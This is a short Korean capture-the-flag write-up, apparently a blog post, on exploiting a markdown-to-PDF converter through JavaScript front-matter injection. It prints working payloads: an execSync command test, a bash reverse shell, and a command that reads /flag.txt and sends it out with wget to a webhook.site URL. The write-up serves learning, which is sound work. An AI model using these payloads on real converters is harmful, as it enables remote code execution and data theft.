markdown to pdf
참고 유튜브 - https://www.youtube.com/watch?v=QVaf4DMYPFc
odyssey CTF에 참여했다
문제가 어마어마하게 어렵다
가장 쉬운 web문제부터 도전했다
가운데 textarea에 markdown을 넣어주면 pdf로 변환해주는 기능이다
지금 작성하는 velog도 markdown으로 작성된다
Markdown to PDF injection
위 유튜브 설명을 보면 markdown을 pdf로 변환하는 과정에서 RCE가 발생하는 취약점이 있다고 한다
payload
---js
((require('child_process')).execSync('id'))
---RCE이 코드를 사용하면 js가 실행되어 RCE가 가능하다
1. reverse shell
첫번째로 유튜브에 나온대로 reverse shell을 획득하려고 시도했다
payload
---js
((require("child_process")).execSync("bash -c 'bash -i >& /dev/tcp/localhost/7777 0>&1'"))
---RCE해당 코드로 내 pc에 연결을 시도했는데 계속 오류가 발생해서 포기
2. network outbound
두번째 시도는 webhook 사이트를 이용한 방법이다
ls -al을 통해 directory list를 확인하려 했지만 오류가 계속 발생해서 그냥 flag.txt를 열어봤더니 flag가 나왔다
payload
---js
((require('child_process')).execSync('xd=$(cat /flag.txt) && wget https://webhook.site/165d1295-d458-4c9c-bc8f-8a9395265303/?a=$xd'))
---RCE
문제를 해결하는데 80%의 시간을 검색으로 보냈다
해킹은 그냥 검색을 잘하는 사람이 이기는 것 같다
buaii